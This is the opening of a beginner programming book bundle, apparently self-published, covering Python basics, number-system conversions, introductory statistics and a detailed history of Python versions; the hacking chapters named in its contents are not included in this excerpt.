Coding Languages: SQL, Linux, Python, machine learning. The Step-by-Step Guide for Beginners

Table of Contents:

Book 1: Python Programming for Beginners
Introduction
Chapter 1 Mathematical Concepts
Chapter 2 What Is Python
Chapter 3 Writing The First Python Program
Chapter 4 The Python Operators
Chapter 5 Basic Data Types In Python
Chapter 6 Data Analysis with Python
Chapter 7 Conditional Statements
Chapter 8 Loops – The Never-Ending Cycle
Chapter 9 File handling
Chapter 10 Exception Handling
Chapter 11 Tips and Tricks For Success
Conclusion
Book 2: Python Machine Learning
Introduction
Chapter 1 What is Machine Learning
Chapter 2 Applications of Machine Learning
Chapter 3 Big Data and Machine Learning
Chapter 4 Types Of Machine Learning
Chapter 5 How Does Machine Learning Compare to AI
Chapter 6 Hands on with Python
Chapter 7 What Is Python, and How Do I Use It?
Chapter 8 Machine Learning Algorithms
Chapter 9 Essential Libraries for Machine Learning in Python
Chapter 10 Artificial Neural Networks
Chapter 11 Data Science
Chapter 12 A Quick Look At Deep Learning
Conclusion
Book 3: Linux for Beginners
Introduction
Chapter 1 Basic Operating System Concepts, Purpose and Function
Chapter 2 Basics of Linux
Chapter 3 What are Linux Distributions?
Chapter 4 Setting up a Linux System
Chapter 5 Comparison between Linux and other Operating Systems
Chapter 6 Linux Command Lines
Chapter 7 Introduction to Linux Shell
Chapter 8 Basic Linux Shell Commands
Chapter 9 Variables
Chapter 10 User and Group Management
Chapter 11 Learning Linux Security Techniques
Chapter 12 Some Basic Hacking with Linux
Chapter 13 Types of Hackers
Conclusion
Book 4: SQL Computer Programming for Beginners
Introduction
Chapter 1 Relational Database Concepts
Chapter 2 SQL Basics
Chapter 3 Some of the Basic Commands We Need to Know
Chapter 4 Installing and configuring MySql on your system
Chapter 5 Data Types
Chapter 6 SQL Constraints
Chapter 7 Databases
Chapter 8 Tables
Chapter 9 Defining Your Condition
Chapter 10 Views
Chapter 11 Triggers
Chapter 12 Combining and Joining Tables
Chapter 13 Stored Procedures and Functions
Chapter 14 Relationships
Chapter 15 Database Normalization
Chapter 16 Database Security and Administration
Chapter 17 Real-World Uses
Conclusion


CODING LANGUAGES

SQL, LINUX, PYTHON, MACHINE LEARNING. THE STEP-BY-STEP GUIDE FOR BEGINNERS TO LEARN COMPUTER PROGRAMMING IN A CRASH COURSE + EXERCISES

JOHN S. CODE

© Copyright 2019 - All rights reserved. The content contained within this book may not be reproduced, duplicated or transmitted without direct written permission from the author or the publisher. Under no circumstances will any blame or legal responsibility be held against the publisher, or author, for any damages, reparation, or monetary loss due to the information contained within this book. Either directly or indirectly. Legal Notice: This book is copyright protected. This book is only for personal use. You cannot amend, distribute, sell, use, quote or paraphrase any part, or the content within this book, without the consent of the author or publisher. Disclaimer Notice: Please note the information contained within this document is for educational and entertainment purposes only. All effort has been executed to present accurate, up to date, and reliable, complete information. No warranties of any kind are declared or implied. Readers acknowledge that the author is not engaging in the rendering of legal, financial, medical or professional advice. The content within this book has been derived from various sources. Please consult a licensed professional before attempting any techniques outlined in this book. By reading this document, the reader agrees that under no circumstances is the author responsible for any losses, direct or indirect, which are incurred as a result of the use of information contained within this document, including, but not limited to, — errors, omissions, or inaccuracies.

INTRODUCTION

First of all, I want to congratulate you on purchasing this bundle on programming languages. This book is aimed at those approaching programming and coding languages for the first time: it will teach you the basics, walk you through practice, and give you important tips and advice on the most popular programming languages. In these texts you will have the opportunity to get to know one of the most innovative operating systems, Linux; manage and organize data with the well-known SQL language; learn to write code and master it with Python; and analyze big data with the Machine Learning book, fully entering the world of computer programming. You no longer need to feel left out at work for having no idea how to work with computer data; you can gain a clearer vision and start getting serious about your future. The world is moving forward with technology, and mastering programming languages becomes more and more fundamental for work and for your future in general. I wish you a good read and good luck in this new adventure and in your future.

TABLE OF CONTENTS

1. PYTHON PROGRAMMING FOR BEGINNERS: A hands-on easy guide for beginners to learn Python programming fast, coding language, Data analysis with tools and tricks. John S. Code

2. PYTHON MACHINE LEARNING: THE ABSOLUTE BEGINNER'S GUIDE TO UNDERSTANDING NEURAL NETWORKS, ARTIFICIAL INTELLIGENCE, DEEP LEARNING AND MASTERING THE FUNDAMENTALS OF ML WITH PYTHON. John S. Code

3. LINUX FOR BEGINNERS: THE PRACTICAL GUIDE TO LEARN LINUX OPERATING SYSTEM WITH THE PROGRAMMING TOOLS FOR THE INSTALLATION, CONFIGURATION AND COMMAND LINE + TIPS ABOUT HACKING AND SECURITY. John S. Code

4. SQL COMPUTER PROGRAMMING FOR BEGINNERS:

LEARN THE BASICS OF SQL PROGRAMMING WITH THIS STEP-BY-STEP GUIDE IN THE EASIEST AND MOST COMPREHENSIVE WAY FOR BEGINNERS, INCLUDING PRACTICAL EXERCISES. John S. Code

PYTHON PROGRAMMING FOR BEGINNERS: A HANDS-ON EASY GUIDE FOR BEGINNERS TO LEARN PYTHON PROGRAMMING FAST, CODING LANGUAGE, DATA ANALYSIS WITH TOOLS AND TRICKS.

JOHN S. CODE

Table of Contents

Introduction
Chapter 1 Mathematical Concepts
Chapter 2 What Is Python
Chapter 3 Writing The First Python Program
Chapter 4 The Python Operators
Chapter 5 Basic Data Types In Python
Chapter 6 Data Analysis with Python
Chapter 7 Conditional Statements
Chapter 8 Loops – The Never-Ending Cycle
Chapter 9 File Handling
Chapter 10 Exception Handling
Chapter 11 Tips and Tricks For Success
Conclusion

Introduction

Python is an excellent choice for machine learning for a few reasons. First and foremost, it is a simple language on the surface: even if you are not acquainted with Python, getting up to speed is quick if you have ever used any other language with C-like syntax. Second, Python has an incredible community, which results in great documentation and friendly, thorough answers on Stack Overflow (essential!). Third, thanks to that huge community, there are plenty of useful libraries for Python (both "batteries included" and third-party) that address practically any problem you can have, including machine learning.

History of Python
Python was invented in the late 1980s. Guido van Rossum, the founder, started implementing the language in December 1989. He is Python's only known creator, and his integral role in the growth and development of the language has earned him the nickname "Benevolent Dictator for Life". Python was created to be the successor to a language known as ABC. The next major version, Python 2.0, was released in October 2000 and brought significant upgrades and new features, including a cycle-detecting garbage collector and support for Unicode. Fortunately, this version also made the development process more transparent and community-backed. Python 3.0, which began its existence as "Py3K", was rolled out in December 2008 after a rigorous testing period. Unfortunately, this version was not backward compatible with earlier versions. Still, a significant number of its major features have been backported to versions 2.6 and 2.7, and Python 3 ships the 2to3 utility, which helps automate the translation of Python 2 scripts. Python 2.7's end of life was originally supposed to arrive in 2015, but it was put off until 2020, largely out of concern for the large body of code that could not easily be moved forward to Python 3. In 2017, Google declared that work would be done on Python 2.7 to enhance its performance under concurrently running tasks.

Basic features of Python
Python is a clear and extremely robust programming language, object-oriented in a way comparable to Ruby, Perl, and Java. Some of Python's remarkable highlights:

- It uses an elegant structure, making programs easier to write and analyze.
- It comes with a huge standard library that supports tons of common programming tasks, such as connecting to web servers, processing and handling files, and searching through text with regular expressions.
- Its easy-to-use interactive interpreter makes it simple to test shorter pieces of code. It also comes with IDLE, a basic development environment.

The Python programming language is one of many different coding languages out there. Some are best suited to building websites; others help with gaming or with specific projects you want to handle. But when it comes to finding a great general-purpose language, one that can handle a lot of different tasks at once, Python is the one for you. There are a lot of benefits to working with Python: it is easy enough for a beginner to learn, it has a lot of power behind it, and there is a community of programmers and developers who work with this language and can help you find the answers you are looking for. Python is also freely available, and it can make solving some of your bigger computing problems almost as easy as writing out your thoughts about the solution. You write the code once, and then it runs on almost any platform you like without you needing to change the program at all.

How is Python used?
Python is a general-purpose language that can be used on any modern operating system. It is capable of processing images, numbers, text, scientific data, and a lot of other things that you would like to save and use on your computer. Python may seem like a simple coding language to work with, but it has all the power you are looking for when it is time to start programming. In fact, many major businesses, including YouTube and Google, already use this coding language for complex tasks.

Python is also known as an interpreted language. This means that it is not converted into code readable by the computer before the program is run; instead, this only happens at runtime. Python and other interpreted languages have changed the perception of this kind of coding and have made it an accepted and widely used approach for many kinds of projects.

There are a lot of different tasks the Python language can help you complete. Some of the options you can work with include:

1. Programming any CGI that you need on your web applications.
2. Building your own RSS reader.
3. Working with a variety of files.
4. Creating a calendar with the help of HTML.
5. Reading from and writing to MySQL.
6. Reading from and writing to PostgreSQL.

The Benefits of Working with Python
When it comes to working with Python, there are a lot of benefits to this coding language. It can help you complete almost any kind of coding project while keeping the ease of use you are looking for. Let's take a quick look at some of these benefits:

- Beginners can learn it quickly. If you have always wanted to work with a coding language but have been worried about how much work it would take, or that it would be too hard to handle, then Python is the best option. It is simple to use and has been designed with the beginner in mind.
- It has a lot of power to enjoy. Even though Python is easy enough for a beginner to learn, that doesn't mean you are limited in the power you can get from your code. Python has all the power you need to get many kinds of projects done.
- It can work with other coding languages. When we get to data science and machine learning, you will find that this is really important. Some projects need you to combine Python with another language, and it is easier to do than you may think.
- It is perfect for everything from simple projects all the way up to more complex options like machine learning and data analysis. This will help you complete any project you would like.
- There are a lot of extensions and libraries that come with the Python language, which makes it the best option for all your projects. There are many libraries you can add to Python to make sure it has the capabilities you need.
- There is a large community that comes with Python. This community can answer your questions, show you code you can work with, and more. As a beginner, it is always a great idea to work with some of these community members to ensure that you are learning as much as possible about Python.

When it comes to handling the code you need in your business or other projects, nothing beats working with the Python language. In this guidebook, we will spend some time exploring the different aspects of the Python language, and some of the things you can do with this coding language as well.
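As a small taste of how little ceremony an interpreted language needs, here is a complete, runnable script in the spirit of task 3 above (working with a variety of files); the filename is arbitrary and chosen just for this sketch:

```python
# Write a few lines to a text file, then read them back.
# No compilation step is needed: `python3 demo.py` runs this directly.
lines = ["first line", "second line", "third line"]

with open("demo.txt", "w") as f:
    for line in lines:
        f.write(line + "\n")

with open("demo.txt") as f:
    contents = f.read().splitlines()

print(contents)          # ['first line', 'second line', 'third line']
print(len(contents))     # 3
```

The `with` blocks close the file automatically, which is the idiomatic way to handle files in Python.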

Mathematical Concepts

As we have stated before, computers are physical manifestations of several mathematical concepts. Mathematics is the scientific language of problem solving; over the centuries, mathematicians have theoretically solved many complex problems. Mathematics includes concepts like algebra and geometry.

Number Systems
Mathematics is a game of number manipulation, which puts number systems at the center stage of mathematical concepts. There are several different types of number systems. Before we take a look at them, we have to understand the concept of coding.

Coding
A way to represent values using symbols is called coding. Coding is as old as humanity. Before the number systems we use today, there were other systems to represent values and messages. An example of coding from ancient times is Egyptian hieroglyphs.

Number systems are also examples of coding because values are represented using special symbols.

There are different types of number systems, and we are going to discuss a few relevant ones.

Binary System
A binary system has only two symbols, 1 and 0, which are referred to as bits. All numbers are represented by combining these two symbols. Binary systems are ideal for electronic devices because they also have only two states, on or off; in fact, all electronic devices are based on the binary number system. The system is positional, which means the position of a symbol determines the value it contributes, and since there are two symbols, the system has base 2. The sole purpose of input and output systems is to convert data between the binary system and a form that makes better sense to the user. The first bit from the left is called the Most Significant Bit (MSB), while the first bit from the right is called the Least Significant Bit (LSB). Here is the binary equivalent code of "this is a message":

01110100 01101000 01101001 01110011 00100000 01101001 01110011 00100000 01100001 00100000 01101101 01100101 01110011 01110011 01100001 01100111 01100101

Decimal System
The decimal system has ten symbols, the digits 0 through 9. This is also a positional number system where the position of a symbol changes the value it represents. All numbers in this system are created with different combinations of the initial ten symbols, and the system has base 10. It is also called the Hindu-Arabic number system. Decimals make more sense to humans and are used in daily life. There are two reasons for that:

- Creating large numbers from the base symbols follows a consistent pattern.
- Performing arithmetic operations in a decimal system is easier compared to other systems.

Hexadecimal System
The hexadecimal number system is the only one covered here that has letters as symbols. It has the 10 symbols of the decimal system plus the six letters A, B, C, D, E, and F. This is also a positional number system, with base 16. The hexadecimal system is extensively used to encode instructions in assembly language.

Number System Conversion
We can convert numbers from one system to another. There are various online tools to do that, and Python also offers number conversion, but it is better to learn how it is done manually.

Binary to Decimal
Here is a binary number, 01101001; let's convert it to a decimal number.

( 01101001 )2 = 0 x 2^7 + 1 x 2^6 + 1 x 2^5 + 0 x 2^4 + 1 x 2^3 + 0 x 2^2 + 0 x 2^1 + 1 x 2^0
( 01101001 )2 = 0 + 64 + 32 + 0 + 8 + 0 + 0 + 1
( 01101001 )2 = ( 105 )10

Decimal to Binary
To convert a decimal number to binary, we repeatedly divide the number by two until the quotient becomes zero. Recording the remainder generated at each division step, and reading the remainders from last to first, gives us the binary equivalent of the decimal number.
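The two conversions above can be sketched in Python. `bin` and `int` are built-ins; `to_binary` is a hypothetical helper name used here to implement the repeated-division method:

```python
def to_binary(n):
    """Convert a non-negative decimal integer to a binary string
    using the repeated-division-by-two method described above."""
    if n == 0:
        return "0"
    bits = []
    while n > 0:
        bits.append(str(n % 2))  # record the remainder at each step
        n //= 2
    return "".join(reversed(bits))  # remainders are read from last to first

# Binary to decimal: weigh each bit by its power of two
print(int("01101001", 2))   # 105
print(to_binary(105))       # 1101001

# The built-in agrees with the manual method
print(bin(105))             # 0b1101001
```

Note that `int("01101001", 2)` ignores the leading zero, just as the text observes.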

An interesting thing to note here is that ( 01101001 )2 and ( 1101001 )2 represent the same decimal number, ( 105 )10. It means that, just like in the decimal number system, leading zeros can be ignored in the binary number system.

Binary to Hexadecimal
Binary numbers can be converted to hexadecimal equivalents using two methods:

1. Convert the binary number to decimal, then the decimal number to hexadecimal.
2. Break the binary number into groups of four bits and convert each group to its hexadecimal equivalent, keeping the groups' positions in the original binary number intact.

Let's convert ( 1101001 )2 to a hexadecimal number using the second method. The first step is to break the binary number into groups of four bits. If the MSB group has fewer than four bits, pad it to four by adding leading zeros. Grouping starts

from the LSB. So, ( 1101001 )2 will give us ( 1001 )2 and ( 0110 )2. Now, remembering their position in the original binary number, we are going to convert each group to a hexadecimal equivalent. Here is the table of hexadecimal equivalents of four-bit binary numbers.

Binary    Hexadecimal
0000      0
0001      1
0010      2
0011      3
0100      4
0101      5
0110      6
0111      7
1000      8
1001      9
1010      A
1011      B
1100      C
1101      D
1110      E
1111      F

From the table, we can see ( 1001 )2 is ( 9 )16 and ( 0110 )2, the MSB group, is ( 6 )16. Therefore, ( 1101001 )2 = ( 01101001 )2 = ( 69 )16.

Hexadecimal to Binary
We can use the table given above to quickly convert hexadecimal numbers to binary equivalents. Let's convert ( 4EA9 )16 to binary.

( 4 )16 = ( 0100 )2
( E )16 = ( 1110 )2
( A )16 = ( 1010 )2
( 9 )16 = ( 1001 )2

So, ( 4EA9 )16 = ( 0100111010101001 )2 = ( 100111010101001 )2

Decimal to Hexadecimal
You can say hexadecimal is an extended version of the decimal system. Let's convert ( 45781 )10 to hexadecimal. But first, we have to remember this table.

Decimal    Hexadecimal
0          0
1          1
2          2
3          3
4          4
5          5
6          6
7          7
8          8
9          9
10         A
11         B
12         C
13         D
14         E
15         F

We are going to divide the decimal number repeatedly by 16 and record the remainders. The final hexadecimal equivalent is formed by replacing each remainder with its corresponding hexadecimal symbol, read from last to first:

45781 ÷ 16 = 2861, remainder 5
2861 ÷ 16 = 178, remainder 13 (D)
178 ÷ 16 = 11, remainder 2
11 ÷ 16 = 0, remainder 11 (B)

So ( 45781 )10 = ( B2D5 )16.
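These manual conversions can be checked in Python, whose built-in `int` and `format` handle the bases discussed here; `to_hex` is a hypothetical helper name mirroring the repeated-division-by-16 method:

```python
# Hexadecimal to binary and back, via the built-in int() parser
n = int("4EA9", 16)
print(format(n, "b"))       # 100111010101001
print(format(n, "X"))       # 4EA9

# Decimal to hexadecimal by repeated division by 16
def to_hex(n):
    digits = "0123456789ABCDEF"
    if n == 0:
        return "0"
    out = []
    while n > 0:
        out.append(digits[n % 16])  # remainder becomes a hex digit
        n //= 16
    return "".join(reversed(out))   # read remainders from last to first

print(to_hex(45781))        # B2D5
print(int("B2D5", 16))      # 45781
```

`format(n, "b")` drops leading zeros, matching the observation that they can be ignored.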

Hexadecimal to Decimal
Let's convert ( 4EA9 )16 to its decimal equivalent.

( 4EA9 )16 = 4 x 16^3 + 14 x 16^2 + 10 x 16^1 + 9 x 16^0
( 4EA9 )16 = 16384 + 3584 + 160 + 9
( 4EA9 )16 = ( 20137 )10

There is another number system, the octal system, whose unique symbols are 0, 1, 2, 3, 4, 5, 6, and 7. It was developed for small-scale devices that worked on small values with limited resources. With the rapid advancements in storage and other computer resources, the octal system became insufficient and was largely discarded in favor of the hexadecimal number system, though you might still find an old octal-based computer system.

Fractions (Floating Points)
The decimal number system supports a decimal point '.' to represent a portion of a value. For example, to say half of a milk bag is empty using numbers, we can write that 0.5 or ½ of the milk bag is empty. Do other number systems support a fractional point? Yes, they do. Let's see how to convert ( 0.75 )10 or ( ¾ )10 to binary.

¾ x 2 = 6/4 = 1 + 2/4 → first fractional bit is 1, carry the remaining 2/4
2/4 x 2 = 4/4 = 1 → second fractional bit is 1
( 0.75 )10 = ( ¾ )10 = ( .11 )2

Negatives
In the decimal system, a dash or hyphen '-' is placed before a number to declare it negative. There are different ways to denote negative numbers in the binary system. The easiest is to treat the MSB as a sign bit: if the MSB is 1, the number is negative, and if the MSB is 0, the number is positive. Determining whether a hexadecimal number is negative or positive is a bit tricky; the easiest way is to convert the number to binary and apply the binary sign check.

Linear Algebra
Did you hate algebra in school? I have some bad news for you: linear algebra is heavily involved in programming, because it is one of the best mathematical tools for solving problems. According to Wikipedia, algebra is the study of mathematical symbols and the rules for manipulating these symbols. The field advanced thanks to the work of Muhammad ibn Musa al-Khwarizmi, who introduced the reduction and balancing methods and treated algebra as an independent field of mathematics. During that era, variable notation such as 'x' and 'y' was not yet widespread; during the Islamic Golden Age, Arabs favored lengthy "layman's terms" descriptions of problems and solutions, and that is how al-Khwarizmi explained algebraic concepts in his book. The book dealt with many practical real-life problems, including in the fields of finance, planning, and law.

So, we know what algebra is. But where does "linear" come from? For that, we have to understand what a linear system is. It is a mathematical model where the system attributes (variables) have a linear relation among themselves. The easiest way to explain this: if the plot between system attributes is a straight line, the system is linear. Linear systems are much simpler than nonlinear systems. The set of algebraic concepts that relate to linear systems is referred to as linear algebra. Linear algebra helps resolve system problems such as missing attribute values. The first step is to create linear equations to establish the relationships between the system variables.
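As a tiny illustration of recovering missing values from linear equations, here is a sketch that solves a 2x2 linear system with Cramer's rule; the function name and the example system are invented for this illustration:

```python
def solve_2x2(a, b, c, d, e, f):
    """Solve the linear system
         a*x + b*y = e
         c*x + d*y = f
       using Cramer's rule (ratios of determinants)."""
    det = a * d - b * c
    if det == 0:
        raise ValueError("system is singular: no unique solution")
    x = (e * d - b * f) / det
    y = (a * f - e * c) / det
    return x, y

# x + y = 3 and x - y = 1 give x = 2, y = 1
print(solve_2x2(1, 1, 1, -1, 3, 1))   # (2.0, 1.0)
```

Real applications use library solvers for larger systems, but the idea of expressing relationships as linear equations is the same.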

Statistics
Statistics is another important field of mathematics, crucial in various computer science applications. Data analysis and machine learning would not be what they are without the advancements made in statistical concepts during the 20th century. Let's look at some concepts related to statistics.

Outliers
Outlier detection is very important in statistical analysis because it helps homogenize the sample data. After detecting the outliers, deciding what to do with them is crucial, because they directly affect the analysis results. There are several possibilities:

Discarding the outlier. Sometimes it is better to discard outliers because they were recorded due to some error. This usually applies where the behavior of the system is already known.

Investigating a system malfunction. Outliers can also indicate a system malfunction. It is always better to investigate the outliers instead of discarding them straightaway.

Average
Finding the center of a data sample is crucial in statistical analysis because it reveals a lot of system characteristics. There are different types of averages, each signifying something important.

Mean
The mean is the most common average: all the data values are added together and divided by the number of values. For example, suppose you sell shopping bags to a well-renowned grocery store and they want to know how much each shopping bag can carry. You completely fill 5 shopping bags with random grocery items and weigh them. Here are the readings in pounds:

5.5, 6.0, 4.95, 7.1, 5.0

You calculate the mean as (5.5 + 6 + 4.95 + 7.1 + 5) / 5 = 5.71, so you can tell the grocery store your bags hold 5.71 lbs on average.

Median
The median is the center value, by position, of a data sample sorted in ascending order. If the sample has an odd number of values, the median is the value with an equal number of values on each flank. If the sample has an even number of values, the median is the mean of the two middle values.

Mode
The mode is the most recurring value in a dataset. If there is no recurring value in the sample data, there is no mode.

Variance
To find how much each value in a sample varies with respect to the average of the sample, we calculate the variance. Here is the general formula:

variance = sum of (each data point - mean of sample)^2 / number of data points in the sample

If the variance of a sample is low, the data points cluster near the mean and outliers are unlikely.

Standard Deviation
We take the square root of the variance to find the standard deviation, which expresses the spread of the sample in the same units as the data itself.

Probability
No one can accurately tell what will happen in the future; we can only predict what is going to happen with some degree of certainty. The probability of an event is written mathematically as:

probability = number of ways the event can happen / total number of possibilities

A few points:

1. Probability can never be negative.
2. Probability ranges between zero and one.
3. To calculate probability, we assume that the events we are working with occur independently, without any interference. Observing one event can change the probability of a subsequent event; it depends on how we are interacting with the system.

Distribution
There are many types of distributions. In this book, whenever we talk about a distribution, we mean a probability distribution unless explicitly stated otherwise. Take the example of flipping a coin three times; the possible outcomes are:

HHH HHT HTH HTT THH THT TTH TTT

This is a very simple experiment with only a handful of possible outcomes, so we can easily determine the probability of each one. That is almost impossible in complex systems with thousands or millions of possible outcomes. Distributions work much better in such cases by visually representing the probability curve, which makes more sense than a huge table of fractions or small decimal numbers. We call a probability distribution discrete if we know all the possible outcomes beforehand.
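The averages and the coin-flip distribution above can be reproduced with Python's standard `statistics` and `itertools` modules, using the shopping-bag weights from the mean example:

```python
import statistics
from itertools import product

# Shopping-bag weights (in pounds) from the mean example above
weights = [5.5, 6.0, 4.95, 7.1, 5.0]

print(round(statistics.mean(weights), 2))   # 5.71
print(statistics.median(weights))           # 5.5  (middle of the sorted sample)

# Population variance: mean squared deviation from the mean,
# and standard deviation as its square root
var = statistics.pvariance(weights)
print(round(var, 4))
print(round(var ** 0.5, 4))

# Distribution example: every outcome of three coin flips
outcomes = ["".join(p) for p in product("HT", repeat=3)]
print(len(outcomes))   # 8
```

Enumerating outcomes like this only works for small discrete experiments, which is exactly the point the text makes about complex systems.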

What Is Python

Python is an interpreted, general-purpose, high-level, multiparadigm programming language. It allows programmers to use different styles of programming to create simple or even complex programs, get quicker results, and write code almost as if they were speaking a human language rather than talking to a computer. The language is so popular that many major companies already use it in their systems, including Google App Engine, Google Search, YouTube, and iRobot machines. And as knowledge of this language continues to spread, it is likely that even more of the applications and sites we rely on each day will come to work with it as well.

The initial development of Python was started by Guido van Rossum in the late 1980s. Today, it is developed and run by the Python Software Foundation. Because of the features behind this language, Python programmers can accomplish their tasks with many different styles of programming. Python can be used for a variety of things, including serial port access, game development, numeric programming, and web development, to name a few.

A few attributes show why development in Python tends to be faster and more efficient than in some other programming languages:

1. Python is an interpreted language. There is no need to compile the code before executing the program, because Python does not require a separate compilation step. It is also a high-level language that abstracts many sophisticated details away from the programming code; much of this abstraction is aimed at making the code understandable even to those who are just getting started with coding.

2. Python programs are often shorter than equivalent programs in other languages. Although Python offers fast development times, keep in mind that execution time lags a little: compared to fully compiled languages such as C and C++, Python executes at a slower rate. Of course, with the processing speeds of most computers today, the difference is rarely noticed by the people using the system.

There are a lot of different things we can do with the Python language, from the basics all the way to the more complex work in data science and machine learning that we will talk about a little later. Spending some time on this language and its basics will help prepare us for the more complicated things we can do with this code as well.

A. WHY LEARN PYTHON

Learning the ABCs of anything in this world is a must. Knowing the essentials is winning half the battle before you get started. It's easier to proceed when you are equipped with the fundamentals of what you are working on. In the same manner, before you embark on the other aspects of Python, let us level off on the basic elements first. You need to learn and understand the basics of Python as a foundation before advancing to the more complicated components. This fundamental information will greatly help you as you go on, and it will make the learning experience easier and more enjoyable.

Familiarize yourself with the Python official website, https://www.python.org/. Knowing the Python website well gives you leverage in acquiring more information and scaling up your knowledge about Python. You can also get the links you need for your work.

Learn from Python collections. Locate Python collections such as records, books, papers, files, documentation, and archives, and learn from them. You can pick up a number of lessons from these and expand your knowledge about Python. There are also tutorials, communities, and forums at your disposal.

Possess the SEO basics. Acquire some education on Search Engine Optimization so you can interact with experts in the field and improve your level of Python knowledge.

That being said, here are the basic elements of Python.

B. DIFFERENT VERSIONS OF PYTHON

With Guido van Rossum at the helm of affairs, Python has witnessed three major versions over the years since its conception in the '80s. These versions represent the growth, development, and evolution of the scripting language over time, and the history of Python cannot be told without them.

The versions of Python include the following:

• Python 0.9.0:

The first-ever version of Python, released following its implementation and in-house releases at the Centrum Wiskunde & Informatica (CWI) between the years 1989 and 1990, was tagged version 0.9.0. This early version, which was released on alt.sources, had features such as exception handling, functions, and classes with inheritance, as well as the core data types of list, str, and dict, among others. The first release came with a module system obtained from Modula-3, which Van Rossum described as one of the central programming units used in the development of Python. Another similarity the first release bore with Modula-3 is found in the exception model, which comes with an added else clause. With the public release of this early version came a flurry of users, which culminated in the formation of a primary discussion forum for Python in 1994. The group was named comp.lang.python and served as a milestone for the growing popularity of Python.

Following the release of the first version in February of 1991, there were seven other updates made to the early version 0.9.0. These updates took varying tags under the 0.9.x line and were spread out over nearly three years (1991 to 1993). The first update came in the form of Python 0.9.1, which was released in the same month of February 1991 as its predecessor. The next update came in the autumn of the release year, under the label Python 0.9.2. By Christmas Eve of the same year (1991), Python published its third update to the earliest version, under the label Python 0.9.4. By the 2nd of January of the succeeding year, a gift update under the label Python 0.9.5 was released. By the 6th of April, 1992, another update followed, named Python 0.9.6. It wasn't until the next year, 1993, that a further update was released under the tag Python 0.9.8. The final update to the earliest version came on the 29th of July, 1993, and was dubbed Python 0.9.9. These updates marked the first generation of Python development before it transcended into the next version label.

• Python 1.0

After the last update to Python 0.9.0, a new version, Python 1.0, was released in January of the following year, 1994, marking the addition of key new features to the Python programming language. Functional programming tools such as map, reduce, filter, and lambda were part of the new features of the version 1 release. Van Rossum mentioned that the inclusion of map, lambda, reduce, and filter was made possible by a LISP hacker who missed them and submitted working patches.

Van Rossum's contract with CWI came to an end with the release of the first update, version 1.2, on the 10th of April, 1995. In the same year, Van Rossum went on to join CNRI (Corporation for National Research Initiatives) in Reston, Virginia, United States, where he continued to work on Python and published different version updates. Nearly six months after the first version update, version 1.3 was released on the 12th of October, 1995. The third update, version 1.4, came almost a year later, in October of 1996. By then, Python had developed numerous added features. Some of the notable new features included built-in support for complex numbers and keyword arguments which, although inspired by Modula-3, shared a bit of a likeness with the keyword arguments of Common Lisp. Another included feature was a simple form of data hiding through name mangling, although it could be easily bypassed.

It was during his days at CNRI that Van Rossum began the CP4E (Computer Programming for Everybody) program, which was aimed at giving more people easy access to programming through simple literacy in programming languages. Python was a pivotal element in van Rossum's campaign, and owing to its concentration on clean forms of syntax, Python was an already suitable programming language. Also, since the goals of ABC and CP4E were quite similar, there was no hassle putting Python to use. The program was pitched to and funded by DARPA, although it became inactive in 2007 after running for eight years. However, Python still tries to be relatively easy to learn by not being too arcane in its semantics and syntax, although reaching out to non-programmers is no longer a priority.

The year 2000 marked another significant step in the development of Python, when the Python core development team switched to a new platform, BeOpen, where a new group, the BeOpen PythonLabs team, was formed. At the request of CNRI, a new version update, 1.6, was released on the 5th of September, succeeding the fourth version update (Python 1.5) of December 1997. This update marked the complete cycle of development for the programming language at CNRI, because the development team left shortly afterward. This change affected the release timelines of the new version Python 2.0 and the version 1.6 update, causing them to clash. It was only a question of time before Van Rossum and his crew of PythonLabs developers switched to Digital Creations, with Python 2.0 being the only version ever released by BeOpen. With the version 1.6 release caught between a switch of platforms, it didn't take long for CNRI to include a license in the release of Python 1.6. The license contained in the release was quite a bit longer than the previously used CWI license, and it

featured a clause mentioning that the license was under the protection of the laws applicable to the State of Virginia. This intervention sparked a legal feud which drew the Free Software Foundation into a debate regarding the "choice-of-law" clause being incompatible with that of the GNU General Public License. At this point, there was a call for negotiations between the FSF, CNRI, and BeOpen regarding a change to Python's free software license which would serve to make it compatible with the GPL. The negotiation process resulted in the release of another version update, under the name of Python 1.6.1. This new version was no different from its predecessor in any way aside from a few new bug fixes and the newly added GPL-compatible license.

• Python 2.0:

After the many legal dramas surrounding the release of the second-generation Python 1.0, which culminated in the release of an unplanned update (version 1.6.1), Python was keen to put it all behind and forge ahead. So, in October of 2000, Python 2.0 was released. The new release featured additions such as list comprehensions, which were obtained from the functional programming languages Haskell and SETL. The syntax of this latest version was akin to that found in Haskell, but differed in that Haskell used punctuation characters while Python stuck to alphabetic keywords. Python 2.0 also featured a garbage collection system which was able to collect reference cycles. A version update (Python 2.1) quickly followed the release of Python 2.0, as Python 1.6.1 had done. However, due to the legal issue over licensing, Python renamed the license on the new release to the Python Software Foundation License. As such, every new specification, code, or documentation added from the release of version update 2.1 was owned and protected by the PSF (Python Software Foundation)

which was a nonprofit organization created in the year 2001. The organization was designed similarly to the Apache Software Foundation. The release of version 2.1 came with changes made to the language specification, allowing support of nested scopes, as in other statically scoped languages. However, this feature was, by default, not in use and not required until the release of the next update, version 2.2, on the 21st of December, 2001.

Python 2.2 came with a significant innovation of its own in the form of a unification of Python's types and classes. The unification process merged the types coded in C and the classes coded in Python into a single hierarchy, which made Python's object model totally and consistently object-oriented. Another significant innovation was the addition of generators, as inspired by Icon.

Two years after the release of version 2.2, version 2.3 was published in July of 2003. It was nearly another two years before version 2.4 was released, on the 30th of November in 2004. Version 2.5 came less than a year after Python 2.4, in September of 2006. This version introduced the "with" statement, which encloses a code block within a context manager, as in obtaining a lock before running the code block and releasing the lock afterward, or opening a file and then closing it. The block of code made for behavior similar to RAII (Resource Acquisition Is Initialization) and replaced the typical "try"/"finally" idiom.

The release of version 2.6 on the 1st of October, 2008 was strategically scheduled such that it coincided with the release of Python 3.0. Aside from the proximity in release date, version 2.6 also had some new features like the "warnings" mode, which outlined the use of elements that had been omitted from Python 3.0. Subsequently, in July of 2010, another update to Python 2.x was released in the version of Python 2.7. The new version update shared features and coincided in release with version 3.1, the

first version update of Python 3. At this time, Python drew an end to the parallel releases of the 2.x and 3.x series, making Python 2.7 the last version update of the 2.x series. Python went public in November of 2014 to announce to its user base that the availability of Python 2.7 would stretch until 2020; however, users were advised to switch to Python 3 at their earliest convenience.

• Python 3.0:

